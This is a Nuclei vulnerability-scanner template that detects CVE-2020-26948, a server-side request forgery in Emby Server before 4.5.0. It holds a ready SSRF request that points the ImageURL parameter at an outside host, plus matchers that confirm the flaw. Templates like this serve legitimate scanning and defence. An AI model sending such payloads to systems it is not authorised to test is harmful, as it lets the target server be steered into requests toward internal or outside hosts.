nuclei-templates/cves/2020/CVE-2020-26948.yaml

33 lines
852 B
YAML

id: CVE-2020-26948
info:
name: Emby Server SSRF
author: dwisiswant0
severity: critical
reference: https://github.com/btnz-k/emby_ssrf
description: Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.
tags: cve,cve2020,emby,jellyfin,ssrf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2020-26948
cwe-id: CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
words:
- "Name or service not known"
part: body
- type: word
words:
- "text/plain"
part: header